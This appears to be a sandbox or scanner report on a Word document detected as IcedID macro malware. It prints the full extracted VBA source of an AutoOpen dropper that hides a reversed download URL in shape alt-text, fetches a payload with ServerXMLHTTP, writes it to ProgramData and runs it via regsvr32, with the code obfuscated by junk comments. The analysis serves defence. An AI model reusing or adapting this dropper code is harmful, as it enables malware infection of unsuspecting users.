MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set hYtaT = CreateObject("Script" + AihOg) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11499 bytes |
SHA-256: 193d62f30d5054bbf24c934e93435de0a4341e40399851e4c156a9956625d5bb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(ZMMIG, Optional ByVal LMUIR As String = "c:\programdata\yPWvE.txt", Optional ByVal AihOg As String = "ing.FileSystemObject")
' Dart organs
' Shamelessness anchoring headband
' Month emulated cricketer gaunter
' Birthrate monopolised massacres
' Benders vesting rhetoricians okays
' Beamy revolt lea prussic distastefully proselytising
' Petrifying getable
' Pivoted
' Atrocious extortion
' Advising seaboard interconnection tooting hearttoheart extrapolation juggler
' Acoustical dreading
' Stolid helpfully enquirers lichee
' Localisations
' Secretively
' Ordinary debacles
' Revelation
' Guanaco american splattered capsizing glassy
' Plucker
' Hugging papering pope
Set hYtaT = CreateObject("Script" + AihOg)
' Labouring notification
' Transceiver stopgap donations trombonist
' Executing proximately
' Sightsee sheen
' Bide rands evaporating magnetosphere propionate
' Poising akin enormity pastor notions
' Edema allelic grinder
Set ZPBom = hYtaT.CreateTextFile(LMUIR)
' Husbandry derailed competitors
' Ballbearings esoterically
' Quietening moribundity fumigation
' Depot publicists
' Evilness magazine redheaded
' Unreliably sissy dichotomies severable cahoots
ZPBom.WriteLine ZMMIG
' Dragon discharges inhibitory duchess
' Practitioners ill consents rook
' Extinctions dictionary
' Biometry quash spoonful describe reheated oxymoron
' Collisional subjected suffocating
' Choir
ZPBom.Close
' Smile winded imperative magics
' Inexpedient antrum churning predators
' File derided earth aristocrats
' Admixture geographer waterproof incomprehensible boded
' Moderated vibrationally appellate
' Polysaccharides glares oxidants drainer replicator
' Ejectors parabolas typecast biogeographical gametes heifer
' Openings dealership
' Thieves smarted
' Curtaining
' Scandal circulate duller
' Intoxicated reticulum circlets antiviral carts
' Piffle drills
' Amplification
' Broaden sensitive unnamed
' Bequeath
' Lifelessly southernmost extendability
' Toasted scribing fitments
' Tapered
' Librates corrode serially security uncertainty feature
' Backlight
' Complexion spurns
' Saltier folkish poised agakhan drunkards plural hoaxing
' Cheddar wordgame enchant
' Blueblooded brute shaver tracking contrition housemaid
' Enounced robbery shriekers
' Coauthors
' Cist hostler gatepost
' Crosscountry memorised
' Assignable descriptiveness tripwire addictive cowing
' Malayan enhanced
' Overmuch counterintelligence resounded outermost etching
' Drifters hoeing sign devilled
' Cringing arcana orbitals potable
' Slapped
' Depicts inexhaustibly cockier
' Crimping plosive
' Vaulted punchlines ennobles raves
' Prosecutions slovenliness squander
' Vends
' Rephrased dirtiness incite hairpin tussock surrogates hungrily
End Sub
' Oily wholeness
' Declivity loped ages attainment
' Helixes convalescent eater quickness
' Dispersion
Sub AutoOpen()
' Breathlessness horseshoes insidious muddled illimitable
' Formulae taping painfully govern
' Stylish eddied forenames gunned
' Letterhead rambler
' Scholastic
' Agreeing available henchman stoppers
' Conveniences
' Impasse rips sage
' Glibly lymphocytic
' Opiate instilling
' Unseasonal terraces
' Peregrines south apprehending gatehouse
' Chaffinch guesses pronouncing
' Curie quarrymen hegemony identifiers
' Insulated miserable inveigled
' Sightlessly
' Knitters hic
' Careerism strengthened stead
' Tuck outboard jeans fossa etchings
' Insignificant purl protestantism
' Colouration unbutton superintend well
' Destruct rainforests restorations colonels
' Diffusion diplomats
' Kneads gladioli
' Amateur
Dim QUVsR As New UqPjU
' Loudspeaker bounding candles piety
' Equivocal vacate interrogate middleoftheroad
' Diabetic chiseled
' Satisfies turquoise
' Gritted warranted brazen absences phobias
' Enamelled united cramp depictions batched uploads crayoned
' Piglets mien sniffles
ZMMIG = QUVsR.BRotJ("MSXML2.serverXMLHTTP")
' Acoustical cain yell
' Enclave
' Ordinal disallowed minute unfancied overhauls
' Sponsorship methanol horny normalisations jazz transcendentals
' Angers convalescence pertinaciously
ZoSTL AzDRk(ZMMIG)
' Recordists sterilisation hangglide bodices wand
' Scullery carsick humouring eyetooth
' Technophobia curves despairing farther
' Posed shabbily
' Interlocutor intercepts fluoride
' Negatively
' Metering junk carps rationalistic
' Anisotropy limelight
' Amphora sinking cake wallows
' Disinfectant
' Sociologists buttermilk ferments
KHQmw IPSxZ(0) + "vr32 c:\programdata\yPWvE.txt", "ws"
End Sub
Function uvSyV(csVXt, SKOXB)
' Sectarian desires householder live obstinate honour
' Birthday readings tankage subside bivouacs
' Percussed thump instinctively
' Tunefully tramps
' Pantheon distributes needless
uvSyV = Split(csVXt, SKOXB)
End Function
Attribute VB_Name = "gvXzI"
' Bundling expurgating desertification
' Upholder nuptial
' Greenhorns mindedness
' Acquit autobiographically underground leaked
Function AzDRk(vQzhw)
' Marquess headmaster pert
' Skydive reiteration commit whipper altered
' Volume
' Teethe fascinated casuistry represented
' Bidirectional interrelationship
' Exmember
AzDRk = StrConv(vQzhw, vbUnicode)
' Eigenstates unshockable gustier metallic
' Sunblock velocity senora paediatrics
' Reciprocated
' Mustier cornea pods machete
' Erases serotonin
' Stocks tales flit wellsupported indolent
End Function
' Appellate orders presumptuous inception downy nit
' Lassitude dimers irritation
' Intense fiefdom
' Elm equator
Function nEDVs()
' Quadratures weightiest
' Razes abridged
' Subcontinent impiety terrazzo
' Sighed imputing deify
' Mimicker richness
' Iodide deny loosed backbench discountability
' Supplying degeneracy objectionableness
' Constitutively frequents peptic azimuth
' Screenings buttons whippets
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Yep detections umlaut instructing
' Layperson echoed
' Views
' Edgeways obscureness dame lingerie cereal
Function IPSxZ(JvWDe)
' Indians chocolates ruminating
' Ding thoroughbreds lisped midriff servitude vigilantly sociobiology
' Revolutionaries
' Faints cowled larks weaken
' Penniless
' Transatlantic
' Combustibles compatriot endeavour parakeet bathtubs
' Shooter baying nonexistence neutered
' Nihilistic vogue push adores
XRqyP = nEDVs()
GCBJK = uvSyV(XRqyP, "###")
Ivacy = GCBJK(JvWDe)
IPSxZ = Ivacy
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Summers pretentiously
' Doorknobs subtotals demarcation chockfull
' Alterations creditably
' Lairds slugged mapper chemist moped
' Insipid weakness
Function BRotJ(fonwZ)
' Fakes jaywalker details
' Assures harmonising spawning autumnal
' Gall pensioner
' Steaming vegetables
' Insertion attenuated unprompted landmarks
' Remaindered cashing filaments
Dim gUAgR As Object
' Presumptive croons vaguest controller chins
' Curd
' Cations stairwell
' Immunology relishing igniter
' Governor cyclical item attention trimmer drunken
' Limitless guanine matchmaker breakpoints defrost
' Parched dentine rayon jugglers confirmed injudicious
' Erasures
' Waned replanted
' Herein
' Aluminium fulfils
Set gUAgR = CreateObject(fonwZ)
' Remixed disregarded breakdown anthropoid
' Reassigning draining grasslands whodunnit unsteadily
' Evader satan
' Selfconsciousness
' Wags safer
' Coldish afloat
' Disallows concurrent
' Unpunctuality drawcord decreases fined optimism
' Bucking bores unportable appropriation
' Projectively lauders floozie balsam aloofness northmen
' Cloned numismatics embezzlement
' Learnt repacking
' Jurors
' Wordplay psychological
' Grievously
' Skipping tumulus captivating
' Spat construct equality
' Limeys suicidally
' Overlong salted
' Operator heterodox demoralised twenties vacant
YRPSp = IPSxZ(1)
' Drop disdained policyholders sedition stools malformed
' Detestation teehee
' Favouritism skinniest
' Nail ecologists abandoned asymmetric fencer rancid
' Acapulco
' Shuttlecocks trundling appetising
gUAgR.Open "GET", Reverse(YRPSp), False
' Baulks salaries bedsores prefers
' Fourteenth curlew bisexual
' Offering generously quarterstaffs baubles carnivals
' Jumpiness illtempered whereto unreleasable
gUAgR.Send
' Siberia pyromaniacs offensive
' Kampong garbles bolt
' Entangling swarming blackouts stiffly distressed stigmatised inglorious
' Baptised outperform kalif scrapped
BRotJ = gUAgR.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(WSamo, buuGY)
' Softie overemphasise coordinates abusively
' Walkout ejecting mnemonically primogeniture
' Girth rehousing
' Dangled sticky enraged impediment
' Bladed surly
' Eclipse
' Subsequently excitation generals
Set udRpu = CreateObject(buuGY + "cript.shell")
' Peroration involvements
' Behaviourist evacuee sleepier wallets individualised
' Orthodoxy directed tantalise
' Thunderclaps satisfies solenoids
' Silica doses jewsharp
' Googly overcoats shortcomings dramatically deafens
' Antediluvian
' Amassing
' Pegs belongings relents chuck mechanicals
' Firms swindled
' Grazed mutilated
' Notably misappropriation
' Dielectric protestant stouter husbands
' Unassociated ignorable impersonator mount
' Honeycombed reddest buddings lettings
' Babysitters leaning beaching reverential unwholesome
' Playfulness neediest
' Wax
' Reordered graduations caked
' Poised loading
' Sensation parsley lectureships
' Sipped tons lousily
' Insensibility park nursery drip
' Suck polytopes instrumented bereavements worship
' Exhibitionists blowup reconsider
' Breadwinner crazed ferny lookingglasses
' Misdealing mildewed attire
' Officialdom intrigue temporality articulated
' Allayed prefixed vacuole recogniser shakable elites
' Animal insulators fencers
' Outlook
' Restyled quaggas hindbrain
' Springboard ascribable
' Harangue adverb eighties lissomeness
' Atonement shamefully nocturnal
' Insinuated diehards bellyful
' Agility
' Liabilities manslaughter enunciate
' Rectitude esthetic
' Bequeathed burned gold chicks morn
' Installer sleight incinerated swabs redrawn
' Sneakiest condones
' Caricaturisation
' Mannequins tranches haemorrhoids telescoped
' Legislate flaunts gatherings halfhearted propel
' Wastings aromatherapist mistrusting
udRpu.exec WSamo
' Embryo
' Zooms chesty griefs
' Endomorphisms wavered vestibule
' Paratroop lolling compere
' Filled biophysical indulging overwhelmed
' Unestablished elderly burbled
' Census monotony
' Disquisitions rushing underpin
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44032 bytes |
SHA-256: 4762bbc52004d9307318f3339aa350f8a517e30e5608c7fb0d571703e6735295 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.